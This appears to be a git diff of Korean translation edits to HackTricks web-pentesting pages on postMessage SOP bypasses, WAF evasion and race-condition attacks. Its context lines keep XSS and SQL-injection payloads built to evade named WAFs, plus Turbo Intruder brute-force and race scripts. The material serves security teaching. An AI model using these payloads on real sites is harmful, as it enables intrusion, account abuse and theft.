 ```
-주요 문제는 [**메인 페이지**](https://so-xss.terjanq.me)가 `data.body`를 전송하기 위해 DomPurify를 사용하므로, 자신의 HTML 데이터를 해당 코드로 전송하려면 **bypass** `e.origin !== window.origin`이 필요하다는 것입니다.
+주요 문제는 [**메인 페이지**](https://so-xss.terjanq.me)가 DomPurify를 사용하여 `data.body`를 전송하기 때문에, 자신의 HTML 데이터를 해당 코드로 전송하려면 **bypass** `e.origin !== window.origin`을 해야 한다는 것입니다.
 
-그들이 제안하는 해결책을 살펴보겠습니다.
+제안된 해결책을 살펴보겠습니다.
 
 ### SOP bypass 1 (e.origin === null)
 
 `//example.org`가 **sandboxed iframe**에 포함되면, 페이지의 **origin**은 **`null`**이 됩니다. 즉, **`window.origin === null`**입니다. 따라서 `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">`를 통해 iframe을 포함시키기만 하면 **`null` origin**을 **강제**할 수 있습니다.
 
-페이지가 **embeddable**이라면, 그 방법으로 보호를 우회할 수 있습니다(쿠키는 `SameSite=None`으로 설정해야 할 수도 있습니다).
+페이지가 **embeddable**이었다면, 그 방법으로 보호를 우회할 수 있습니다 (쿠키는 `SameSite=None`으로 설정해야 할 수도 있습니다).
 
 ### SOP bypass 2 (window.origin === null)
 
-덜 알려진 사실은 **sandbox 값 `allow-popups`가 설정되면** **열린 팝업**이 **모든 sandboxed 속성**을 **상속**한다는 것입니다. `allow-popups-to-escape-sandbox`가 설정되지 않는 한, **null origin**에서 **팝업**을 열면 팝업 내부의 **`window.origin`**도 **`null`**이 됩니다.
+덜 알려진 사실은 **sandbox 값 `allow-popups`가 설정되면** **열린 팝업**이 모든 **sandboxed attributes**를 **상속**받는다는 것입니다. `allow-popups-to-escape-sandbox`가 설정되지 않는 한, **null origin**에서 **팝업**을 열면 팝업 내부의 **`window.origin`**도 **`null`**이 됩니다.
 
 ### Challenge Solution
 
-따라서 이 챌린지에서는 **iframe**을 **생성**하고, 취약한 XSS 코드 핸들러가 있는 페이지(`/iframe.php`)로 **팝업을 열면**, `window.origin === e.origin`이므로 두 값이 모두 `null`이기 때문에 **XSS를 악용할 수 있는 페이로드를 전송**할 수 있습니다.
+따라서 이 챌린지에서는 **iframe**을 **생성**하고, 취약한 XSS 코드 핸들러가 있는 페이지(`/iframe.php`)로 **팝업을 열면**, `window.origin === e.origin`이므로 두 값이 모두 `null`이기 때문에 **XSS를 이용할 수 있는 페이로드를 전송**할 수 있습니다.
 
-그 **페이로드**는 **식별자**를 가져와서 **XSS**를 **상위 페이지**(팝업을 연 페이지)로 **전송**하며, **상위 페이지**는 **취약한** `/iframe.php`로 **위치 변경**을 합니다. 식별자가 알려져 있기 때문에 `window.origin === e.origin` 조건이 만족되지 않아도 상관없습니다(기억하세요, origin은 **origin**이 **`null`**인 iframe의 **팝업**입니다) 왜냐하면 `data.identifier === identifier`이기 때문입니다. 그러면 **XSS가 다시 트리거**되며, 이번에는 올바른 origin에서 발생합니다.
+그 **페이로드**는 **식별자**를 가져와서 **XSS**를 **상위 페이지**(팝업을 연 페이지)로 **전송**하며, **상위 페이지**는 **취약한** `/iframe.php`로 **위치 변경**을 합니다. 식별자가 알려져 있기 때문에 `window.origin === e.origin` 조건이 만족되지 않아도 상관없습니다 (기억하세요, origin은 **origin**이 **`null`**인 iframe의 **팝업**입니다) 왜냐하면 `data.identifier === identifier`이기 때문입니다. 그러면 **XSS가 다시 트리거**되며, 이번에는 올바른 origin에서 발생합니다.
 ```html
 <body>
 <script>
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
index b3b377035..149d7234e 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
@@ -1,12 +1,12 @@
-# SOP 우회하기 - 2
+# SOP 우회하기 - Iframes - 2
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## SOP-2의 Iframes
 
-이 [**문제**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc) 의 [**해결책**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc)**,** [**@Strellic\_**](https://twitter.com/Strellic_) 은 이전 섹션과 유사한 방법을 제안합니다. 확인해 봅시다.
+이 [**해결책**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution)에서 [**도전 과제**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc)**,** [**@Strellic\_**](https://twitter.com/Strellic_)는 이전 섹션과 유사한 방법을 제안합니다. 확인해 봅시다.
 
-이 문제에서 공격자는 **우회해야** 합니다:
+이 도전 과제에서 공격자는 **우회해야** 합니다:
 ```javascript
 if (e.source == window.calc.contentWindow && e.data.token == window.token) {
 ```
@@ -25,12 +25,12 @@ await new Promise((r) => setTimeout(r, 2000)) // wait for page to load
 iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`)
 document.body.removeChild(iframe) //e.origin === null
 ```
-**두 번째 체크**를 우회하기 위해 **`token`**을 값 `null`로 보내고 **`window.token`** 값을 **`undefined`**로 만드는 방법은 다음과 같습니다:
+**두 번째 체크**를 우회하기 위해 **`token`** 값을 `null`로 설정하고 **`window.token`** 값을 **`undefined`**로 만드는 방법은 다음과 같습니다:
 
 - 값이 `null`인 `token`을 postMessage로 보내는 것은 사소한 일입니다.
-- **`window.token`**은 **`document.cookie`**를 사용하는 함수 **`getCookie`**를 호출할 때 사용됩니다. **`null`** 출처 페이지에서 **`document.cookie`**에 접근하면 **error**가 발생한다는 점에 유의하세요. 이로 인해 **`window.token`**은 **`undefined`** 값을 가지게 됩니다.
+- **`window.token`**은 **`document.cookie`**를 사용하는 **`getCookie`** 함수 호출에서 사용됩니다. **`null`** 출처 페이지에서 **`document.cookie`**에 접근하면 **error**가 발생한다는 점에 유의하세요. 이로 인해 **`window.token`**은 **`undefined`** 값을 가지게 됩니다.
 
-최종 솔루션은 [**@terjanq**](https://twitter.com/terjanq)에 의해 제공된 [**다음**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html)입니다:
+최종 솔루션은 [**@terjanq**](https://twitter.com/terjanq)에 의해 [**다음과 같습니다**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html):
 ```html
 <html>
 <body>
diff --git a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
index 07c7b11a6..7cb0b0b0c 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
@@ -6,7 +6,7 @@
 
 According to [**this writeup**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/), 만약 X-Frame-Header가 없는 웹페이지를 iframe으로 삽입할 수 있다면, 그 안에 있는 다른 iframe의 **위치를 변경할 수 있습니다**.
 
-예를 들어, abc.com이 efg.com을 iframe으로 가지고 있고 abc.com에 X-Frame 헤더가 없다면, **`frames.location`**을 사용하여 efg.com을 evil.com으로 교차 출처 변경할 수 있습니다.
+예를 들어, abc.com이 efg.com을 iframe으로 가지고 있고 abc.com에 X-Frame 헤더가 없다면, **`frames.location`**을 사용하여 efg.com을 evil.com으로 교차 출처로 변경할 수 있습니다.
 
 이는 **postMessages**에서 특히 유용한데, 만약 페이지가 **와일드카드**를 사용하여 민감한 데이터를 전송하고 있다면 `windowRef.postmessage("","*")`, 공격자가 제어하는 위치로 관련 iframe(자식 또는 부모)의 **위치를 변경하고 그 데이터를 훔칠 수 있습니다**.
 ```html
diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md
index c2d8176aa..a2bb7bfd0 100644
--- a/src/pentesting-web/proxy-waf-protections-bypass.md
+++ b/src/pentesting-web/proxy-waf-protections-bypass.md
@@ -17,7 +17,7 @@ location = /admin/ {
 deny all;
 }
 ```
-Nginx는 우회 방지를 위해 경로 정규화를 수행한 후 확인합니다. 그러나 백엔드 서버가 Nginx가 제거하지 않는 문자를 제거하는 다른 정규화를 수행하는 경우, 이 방어를 우회할 수 있을 가능성이 있습니다.
+Nginx는 우회 방지를 위해 경로 정규화를 수행합니다. 그러나 백엔드 서버가 Nginx가 제거하지 않는 문자를 제거하는 다른 정규화를 수행하는 경우, 이 방어를 우회할 수 있을 가능성이 있습니다.
 
 ### **NodeJS - Express**
 
@@ -74,20 +74,20 @@ deny all;
 
 ### 경로 혼동
 
-[**이 게시물**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)에서는 ModSecurity v3(3.0.12까지)가 접근된 경로(매개변수 시작 전)를 포함해야 하는 `REQUEST_FILENAME` 변수를 **부적절하게 구현했다**고 설명합니다. 이는 경로를 얻기 위해 URL 디코드를 수행했기 때문입니다.\
-따라서 mod security에서 `http://example.com/foo%3f';alert(1);foo=`와 같은 요청은 경로가 `/foo`라고 가정합니다. `%3f`가 `?`로 변환되어 URL 경로가 끝나기 때문입니다. 그러나 실제로 서버가 받는 경로는 `/foo%3f';alert(1);foo=`입니다.
+[**이 게시물**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)에서는 ModSecurity v3(3.0.12까지)가 접근된 경로(매개변수 시작까지)를 포함해야 하는 `REQUEST_FILENAME` 변수를 **부적절하게 구현했다**고 설명합니다. 이는 경로를 얻기 위해 URL 디코드를 수행했기 때문입니다.\
+따라서 mod security에서 `http://example.com/foo%3f';alert(1);foo=`와 같은 요청은 `%3f`가 `?`로 변환되어 URL 경로가 종료되기 때문에 경로가 단지 `/foo`라고 가정하지만, 실제로 서버가 받을 경로는 `/foo%3f';alert(1);foo=`입니다.
 
 변수 `REQUEST_BASENAME`과 `PATH_INFO`도 이 버그의 영향을 받았습니다.
 
-Mod Security 버전 2에서도 비슷한 일이 발생하여 특정 확장자(예: `.bak`)와 관련된 파일에 대한 접근을 방지하는 보호를 우회할 수 있었습니다. 이는 점을 `%2e`로 URL 인코딩하여 전송함으로써 가능했습니다. 예를 들어: `https://example.com/backup%2ebak`.
+Mod Security 버전 2에서도 비슷한 일이 발생하여 특정 확장자와 관련된 백업 파일(예: `.bak`)에 대한 사용자 접근을 방지하는 보호를 우회할 수 있었습니다. 이는 점을 `%2e`로 URL 인코딩하여 전송함으로써 가능했습니다. 예를 들어: `https://example.com/backup%2ebak`.
 
 ## AWS WAF ACL 우회 <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
 
 ### 잘못된 헤더
 
-[이 연구](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)에서는 AWS가 제대로 파싱하지 못한 "잘못된" 헤더를 전송하여 HTTP 헤더에 적용된 AWS WAF 규칙을 우회할 수 있었다고 언급합니다. 그러나 백엔드 서버는 이를 파싱할 수 있었습니다.
+[이 연구](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)에서는 AWS가 제대로 파싱하지 못한 "잘못된" 헤더를 전송함으로써 HTTP 헤더에 적용된 AWS WAF 규칙을 우회할 수 있었다고 언급합니다. 그러나 백엔드 서버는 이를 파싱할 수 있었습니다.
 
-예를 들어, X-Query 헤더에 SQL 인젝션이 포함된 다음 요청을 전송하는 것입니다:
+예를 들어, 헤더 X-Query에 SQL 인젝션이 포함된 다음 요청을 전송합니다:
 ```http
 GET / HTTP/1.1\r\n
 Host: target.com\r\n
@@ -110,7 +110,7 @@ AWS WAF를 우회할 수 있었던 이유는 NODEJS 서버는 다음 줄이 헤
 
 - [**Azure 문서**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**에서:**
 
-구형 웹 애플리케이션 방화벽(Core Rule Set 3.1 이하)은 요청 본문 검사를 끄면 **128 KB**보다 큰 메시지를 허용하지만, 이러한 메시지는 취약점 검사를 받지 않습니다. 최신 버전(Core Rule Set 3.2 이상)에서는 최대 요청 본문 제한을 비활성화하여 동일한 작업을 수행할 수 있습니다. 요청이 크기 제한을 초과하면:
+구형 웹 애플리케이션 방화벽(Core Rule Set 3.1 이하)은 요청 본문 검사를 끔으로써 **128 KB**보다 큰 메시지를 허용하지만, 이러한 메시지는 취약점 검사를 받지 않습니다. 최신 버전(Core Rule Set 3.2 이상)에서는 최대 요청 본문 제한을 비활성화하여 동일한 작업을 수행할 수 있습니다. 요청이 크기 제한을 초과하면:
 
 **차단 모드**: 요청을 기록하고 차단합니다.\
 **탐지 모드**: 제한까지 검사하고 나머지는 무시하며, `Content-Length`가 제한을 초과하면 기록합니다.
@@ -143,7 +143,7 @@ AWS WAF를 우회할 수 있었던 이유는 NODEJS 서버는 다음 줄이 헤
 ```
 ### 컨텍스트 WAF 우회하기 위한 인코딩 <a href="#ip-rotation" id="ip-rotation"></a>
 
-[**이 블로그 포스트**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)에서 언급된 바와 같이, 사용자 입력의 컨텍스트를 유지할 수 있는 WAF를 우회하기 위해 WAF 기술을 악용하여 사용자의 입력을 실제로 정규화할 수 있습니다.
+[**이 블로그 포스트**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)에서 언급된 바와 같이, 사용자 입력의 컨텍스트를 유지할 수 있는 WAF를 우회하기 위해 WAF 기술을 악용하여 실제로 사용자 입력을 정규화할 수 있습니다.
 
 예를 들어, 포스트에서는 **Akamai가 사용자 입력을 10번 URL 디코딩했다**고 언급합니다. 따라서 `<input/%2525252525252525253e/onfocus`와 같은 것은 Akamai에 의해 `<input/>/onfocus`로 인식되며, **태그가 닫혔기 때문에 괜찮다고 생각할 수 있습니다**. 그러나 애플리케이션이 입력을 10번 URL 디코딩하지 않는 한, 피해자는 `<input/%25252525252525253e/onfocus`와 같은 것을 보게 되며, 이는 **여전히 XSS 공격에 유효합니다**.
 
@@ -158,7 +158,7 @@ AWS WAF를 우회할 수 있었던 이유는 NODEJS 서버는 다음 줄이 헤
 - AWS/Cloudfront:`docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>`
 - Cloudflare:`cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">`
 
-또한, **일부 WAF가 사용자 입력의 컨텍스트를 이해하는 방식에 따라** 이를 악용할 수 있는 가능성이 있다고 언급됩니다. 블로그에서 제안된 예시는 Akamai가 `/*`와 `*/` 사이에 무엇이든 넣는 것을 허용(했을) 수 있다는 것입니다(이는 일반적으로 주석으로 사용되기 때문입니다). 따라서 `/*'or sleep(5)-- -*/`와 같은 SQL 인젝션은 포착되지 않으며, `/*`가 인젝션의 시작 문자열이고 `*/`가 주석 처리되기 때문에 유효합니다.
+또한, **일부 WAF가 사용자 입력의 컨텍스트를 이해하는 방식에 따라** 이를 악용할 수 있는 가능성이 있다고 언급됩니다. 블로그에서 제안된 예는 Akamai가 `/*`와 `*/` 사이에 무엇이든 넣는 것을 허용(했을) 수 있다는 것입니다(이는 일반적으로 주석으로 사용되기 때문입니다). 따라서 `/*'or sleep(5)-- -*/`와 같은 SQL 인젝션은 포착되지 않으며, `/*`가 인젝션의 시작 문자열이고 `*/`가 주석 처리되기 때문에 유효합니다.
 
 이러한 종류의 컨텍스트 문제는 WAF가 악용할 것으로 예상하는 것 외의 다른 취약점을 **악용하는 데에도 사용될 수 있습니다**(예: 이는 XSS를 악용하는 데에도 사용될 수 있습니다).
 
diff --git a/src/pentesting-web/race-condition.md b/src/pentesting-web/race-condition.md
index 1f79216a0..95dc38563 100644
--- a/src/pentesting-web/race-condition.md
+++ b/src/pentesting-web/race-condition.md
@@ -9,7 +9,7 @@
 
 Race condition을 이용하는 데 있어 주요 장애물은 여러 요청이 동시에 처리되도록 보장하는 것입니다. **처리 시간의 차이가 매우 적어야 하며, 이상적으로는 1ms 미만이어야 합니다.**
 
-여기 요청 동기화를 위한 몇 가지 기술이 있습니다:
+여기 요청 동기화를 위한 몇 가지 기술을 찾을 수 있습니다:
 
 #### HTTP/2 단일 패킷 공격 vs. HTTP/1.1 마지막 바이트 동기화
 
@@ -19,11 +19,11 @@ Race condition을 이용하는 데 있어 주요 장애물은 여러 요청이 
 **마지막 바이트 동기화를 위한 준비**는 다음을 포함합니다:
 
 1. 스트림을 종료하지 않고 마지막 바이트를 제외한 헤더와 본문 데이터를 전송합니다.
-2. 초기 전송 후 100ms 동안 일시 정지합니다.
+2. 초기 전송 후 100ms 동안 일시 중지합니다.
 3. 최종 프레임을 배치하기 위해 Nagle의 알고리즘을 활용하기 위해 TCP_NODELAY를 비활성화합니다.
 4. 연결을 준비하기 위해 핑을 보냅니다.
 
-보류된 프레임의 후속 전송은 Wireshark를 통해 확인할 수 있는 단일 패킷으로 도착해야 합니다. 이 방법은 일반적으로 RC 공격에 관련되지 않는 정적 파일에는 적용되지 않습니다.
+보류된 프레임의 후속 전송은 단일 패킷으로 도착해야 하며, Wireshark를 통해 확인할 수 있습니다. 이 방법은 일반적으로 RC 공격에 관련되지 않는 정적 파일에는 적용되지 않습니다.
 
 ### 서버 아키텍처에 적응하기
 
@@ -35,11 +35,11 @@ PHP의 세션 핸들러와 같은 프레임워크는 세션별로 요청을 직
 
 #### 속도 또는 자원 제한 극복
 
-연결 준비가 효과가 없다면, 더미 요청의 홍수를 통해 웹 서버의 속도 또는 자원 제한 지연을 의도적으로 유발하여 race condition에 유리한 서버 측 지연을 유도할 수 있습니다.
+연결 준비가 효과적이지 않은 경우, 더미 요청의 홍수를 통해 웹 서버의 속도 또는 자원 제한 지연을 의도적으로 유발하여 race condition에 유리한 서버 측 지연을 유도함으로써 단일 패킷 공격을 용이하게 할 수 있습니다.
 
 ## 공격 예시
 
-- **Tubo Intruder - HTTP2 단일 패킷 공격 (1 엔드포인트)**: 요청을 **Turbo intruder**에 보낼 수 있습니다 (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), 요청에서 **`%s`**에 대해 무작위로 대입할 값을 변경할 수 있습니다. 예: `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` 그리고 드롭다운에서 **`examples/race-single-packer-attack.py`**를 선택합니다:
+- **Tubo Intruder - HTTP2 단일 패킷 공격 (1 엔드포인트)**: 요청을 **Turbo intruder**에 보낼 수 있습니다 (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), 요청에서 **`%s`**에 대해 강제로 변환할 값을 변경할 수 있습니다. 예: `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` 그리고 드롭다운에서 **`examples/race-single-packer-attack.py`**를 선택합니다:
 
 <figure><img src="../images/image (57).png" alt=""><figcaption></figcaption></figure>
 
@@ -52,7 +52,7 @@ engine.queue(target.req, password, gate='race1')
 > [!WARNING]
 > 웹이 HTTP2를 지원하지 않는 경우(오직 HTTP1.1만 지원) `Engine.THREADED` 또는 `Engine.BURP`를 사용하고 `Engine.BURP2`는 사용하지 마십시오.
 
-- **Tubo Intruder - HTTP2 단일 패킷 공격 (여러 엔드포인트)**: RCE를 트리거하기 위해 1개의 엔드포인트에 요청을 보내고 그 후 여러 엔드포인트에 요청을 보내야 하는 경우, `race-single-packet-attack.py` 스크립트를 다음과 같이 변경할 수 있습니다:
+- **Tubo Intruder - HTTP2 단일 패킷 공격 (여러 엔드포인트)**: RCE를 트리거하기 위해 1개의 엔드포인트에 요청을 보내고 다른 엔드포인트에 여러 개의 요청을 보내야 하는 경우, `race-single-packet-attack.py` 스크립트를 다음과 같이 변경할 수 있습니다:
 ```python
 def queueRequests(target, wordlists):
 engine = RequestEngine(endpoint=target.endpoint,
@@ -83,15 +83,15 @@ engine.queue(confirmationReq, gate=currentAttempt)
 # send all the queued requests for this attempt
 engine.openGate(currentAttempt)
 ```
-- Burp Suite의 새로운 '**병렬로 그룹 전송**' 옵션을 통해 **Repeater**에서도 사용할 수 있습니다.
+- Burp Suite의 새로운 '**Send group in parallel**' 옵션을 통해 **Repeater**에서도 사용할 수 있습니다.
 - **limit-overrun**의 경우, 그룹에 **같은 요청을 50번** 추가할 수 있습니다.
 - **connection warming**을 위해, **그룹**의 **시작** 부분에 웹 서버의 비정적 부분에 대한 **요청**을 **추가**할 수 있습니다.
-- 2단계 서브스테이트에서 **하나의 요청과 다른 요청** 사이의 프로세스를 **지연**시키기 위해, 두 요청 사이에 **추가 요청을** **추가**할 수 있습니다.
-- **다중 엔드포인트** RC의 경우, **숨겨진 상태**로 **가는 요청**을 보내기 시작한 다음, 그 뒤에 **숨겨진 상태를 악용하는 50개의 요청**을 보낼 수 있습니다.
+- **지연**을 위해 **하나의 요청과 다른 요청** 사이의 처리 **과정**을 2단계로 나누어, 두 요청 사이에 **추가 요청을** **추가**할 수 있습니다.
+- **multi-endpoint** RC의 경우, **숨겨진 상태**로 **가는 요청**을 먼저 보내고, 그 뒤에 **숨겨진 상태를 이용하는 50개의 요청**을 보낼 수 있습니다.
 
 <figure><img src="../images/image (58).png" alt=""><figcaption></figcaption></figure>
 
-- **자동화된 파이썬 스크립트**: 이 스크립트의 목표는 사용자의 이메일을 변경하면서 새로운 이메일의 확인 토큰이 마지막 이메일로 도착할 때까지 지속적으로 확인하는 것입니다(이는 코드에서 이메일을 수정할 수 있는 RC가 발견되었지만 확인이 이전 이메일로 전송되도록 변수에 첫 번째 이메일이 이미 채워져 있었기 때문입니다).\
+- **자동화된 파이썬 스크립트**: 이 스크립트의 목표는 사용자의 이메일을 변경하면서 새로운 이메일의 확인 토큰이 마지막 이메일로 도착할 때까지 지속적으로 확인하는 것입니다(이는 코드에서 이메일을 수정할 수 있는 RC가 발견되었지만 확인이 이전 이메일로 전송되도록 이메일을 나타내는 변수가 이미 첫 번째 이메일로 채워져 있었기 때문입니다).\
 "objetivo"라는 단어가 수신된 이메일에서 발견되면 변경된 이메일의 확인 토큰을 수신한 것이며 공격을 종료합니다.
 ```python
 # https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun
@@ -228,7 +228,7 @@ response = requests.get(url, verify=False)
 
 ## 원시 BF
 
-이전 연구 이전에 RC를 유발하기 위해 패킷을 가능한 한 빠르게 전송하려고 시도한 몇 가지 페이로드가 있었습니다.
+이전 연구 이전에 RC를 유발하기 위해 패킷을 가능한 한 빨리 전송하려고 시도한 몇 가지 페이로드가 있었습니다.
 
 - **Repeater:** 이전 섹션의 예를 확인하십시오.
 - **Intruder**: **Intruder**에 **요청**을 보내고, **옵션 메뉴**에서 **스레드 수**를 **30**으로 설정하고, 페이로드로 **Null payloads**를 선택한 후 **30**을 생성합니다.
@@ -283,9 +283,9 @@ asyncio.run(main())
 
 ### Limit-overrun / TOCTOU
 
-이것은 **행동을 수행할 수 있는 횟수를 제한하는** 곳에서 **발생하는 취약점**의 가장 기본적인 유형입니다. 예를 들어, 웹 스토어에서 동일한 할인 코드를 여러 번 사용하는 경우입니다. 매우 쉬운 예는 [**이 보고서**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43) 또는 [**이 버그**](https://hackerone.com/reports/759247)**에서 찾을 수 있습니다.**
+이것은 **행동을 수행할 수 있는 횟수를 제한하는** 곳에 **나타나는 취약점**이 있는 가장 기본적인 유형의 경쟁 조건입니다. 예를 들어, 웹 스토어에서 동일한 할인 코드를 여러 번 사용하는 경우입니다. [**이 보고서**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43) 또는 [**이 버그**](https://hackerone.com/reports/759247)**에서 매우 쉬운 예를 찾을 수 있습니다.**
 
-이러한 종류의 공격에는 여러 가지 변형이 있습니다:
+이러한 유형의 공격에는 여러 가지 변형이 있습니다:
 
 - 기프트 카드를 여러 번 사용하기
 - 제품에 대해 여러 번 평가하기
@@ -295,17 +295,17 @@ asyncio.run(main())
 
 ### **숨겨진 하위 상태**
 
-복잡한 레이스 조건을 악용하는 것은 종종 숨겨진 또는 **의도하지 않은 기계 하위 상태**와 상호작용할 수 있는 짧은 기회를 이용하는 것을 포함합니다. 접근 방법은 다음과 같습니다:
+복잡한 경쟁 조건을 악용하는 것은 종종 숨겨진 또는 **의도하지 않은 기계 하위 상태**와 상호작용할 수 있는 짧은 기회를 이용하는 것을 포함합니다. 접근 방법은 다음과 같습니다:
 
 1. **잠재적 숨겨진 하위 상태 식별**
-- 사용자 프로필이나 비밀번호 재설정 프로세스와 같은 중요한 데이터를 수정하거나 상호작용하는 엔드포인트를 파악하는 것부터 시작합니다. 다음에 집중하세요:
-- **저장소**: 클라이언트 측 데이터를 처리하는 것보다 서버 측 지속 데이터를 조작하는 엔드포인트를 선호합니다.
-- **작업**: 기존 데이터를 변경하는 작업을 찾습니다. 이는 새로운 데이터를 추가하는 것보다 악용 가능한 조건을 생성할 가능성이 더 높습니다.
+- 사용자 프로필이나 비밀번호 재설정 프로세스와 같은 중요한 데이터를 수정하거나 상호작용하는 엔드포인트를 찾아보세요. 다음에 집중하세요:
+- **저장**: 클라이언트 측 데이터를 처리하는 것보다 서버 측 지속 데이터를 조작하는 엔드포인트를 선호합니다.
+- **작업**: 기존 데이터를 변경하는 작업을 찾으세요. 이는 새로운 데이터를 추가하는 것보다 악용 가능한 조건을 생성할 가능성이 더 높습니다.
 - **키잉**: 성공적인 공격은 일반적으로 동일한 식별자(예: 사용자 이름 또는 재설정 토큰)에 키가 지정된 작업을 포함합니다.
 2. **초기 탐색 수행**
-- 식별된 엔드포인트에 대해 레이스 조건 공격을 테스트하고 예상 결과에서의 편차를 관찰합니다. 예상치 못한 응답이나 애플리케이션 동작의 변화는 취약점을 신호할 수 있습니다.
+- 식별된 엔드포인트에 대해 경쟁 조건 공격을 테스트하고 예상 결과에서의 편차를 관찰하세요. 예상치 못한 응답이나 애플리케이션 동작의 변화는 취약점을 신호할 수 있습니다.
 3. **취약점 입증**
-- 취약점을 악용하는 데 필요한 최소한의 요청 수로 공격을 좁힙니다. 보통 두 개의 요청이면 충분합니다. 이 단계는 정밀한 타이밍이 필요하기 때문에 여러 번의 시도나 자동화가 필요할 수 있습니다.
+- 취약점을 악용하는 데 필요한 최소한의 요청 수로 공격을 좁히세요. 종종 두 개의 요청만 필요합니다. 이 단계는 정밀한 타이밍이 필요하기 때문에 여러 번의 시도나 자동화가 필요할 수 있습니다.
 
 ### 시간 민감 공격
 
@@ -313,11 +313,11 @@ asyncio.run(main())
 
 **악용 방법:**
 
-- 단일 패킷 공격과 같은 정밀한 타이밍을 사용하여 동시 비밀번호 재설정 요청을 합니다. 동일한 토큰은 취약점을 나타냅니다.
+- 단일 패킷 공격과 같은 정밀한 타이밍을 사용하여 동시 비밀번호 재설정 요청을 만드세요. 동일한 토큰은 취약점을 나타냅니다.
 
 **예시:**
 
-- 두 개의 비밀번호 재설정 토큰을 동시에 요청하고 비교합니다. 일치하는 토큰은 토큰 생성의 결함을 시사합니다.
+- 두 개의 비밀번호 재설정 토큰을 동시에 요청하고 비교하세요. 일치하는 토큰은 토큰 생성의 결함을 나타냅니다.
 
 **이것을 확인하세요** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) **에서 시도해 보세요.**
 
@@ -325,11 +325,11 @@ asyncio.run(main())
 
 ### 결제 및 항목 추가
 
-이 [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation)를 확인하여 상점에서 **결제**하고 **추가 항목을 추가하는 방법**을 알아보세요. 이 항목은 **결제할 필요가 없습니다.**
+이 [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation)를 확인하여 상점에서 **결제**하고 **추가 항목을 추가하는 방법**을 알아보세요. **결제할 필요가 없는 항목입니다.**
 
 ### 다른 이메일 확인
 
-아이디어는 **이메일 주소를 확인하고 동시에 다른 이메일로 변경**하여 플랫폼이 변경된 새 이메일을 확인하는지 알아보는 것입니다.
+아이디어는 **이메일 주소를 확인하고 동시에 다른 이메일로 변경하여 플랫폼이 새로 변경된 이메일을 확인하는지 알아보는 것입니다.**
 
 ### 이메일을 2개의 이메일 주소로 변경하기 (쿠키 기반)
 
@@ -339,15 +339,15 @@ asyncio.run(main())
 
 ### 숨겨진 데이터베이스 상태 / 확인 우회
 
-**2개의 서로 다른 쓰기**가 **데이터베이스** 내에 **정보를 추가하는 데** 사용되면, **첫 번째 데이터만 데이터베이스에 기록된** 짧은 시간이 있습니다. 예를 들어, 사용자를 생성할 때 **사용자 이름**과 **비밀번호**가 **기록되고** **새로 생성된 계정을 확인하기 위한 토큰**이 기록됩니다. 이는 짧은 시간 동안 **계정을 확인하기 위한 토큰이 null**임을 의미합니다.
+**2개의 서로 다른 쓰기**가 **데이터베이스** 내에 **정보를 추가하는 데 사용될 경우**, **첫 번째 데이터만 데이터베이스에 기록된** 짧은 시간이 있습니다. 예를 들어, 사용자를 생성할 때 **사용자 이름**과 **비밀번호**가 **기록되고** **새로 생성된 계정을 확인하기 위한 토큰**이 기록됩니다. 이는 짧은 시간 동안 **계정을 확인하기 위한 토큰이 null**임을 의미합니다.
 
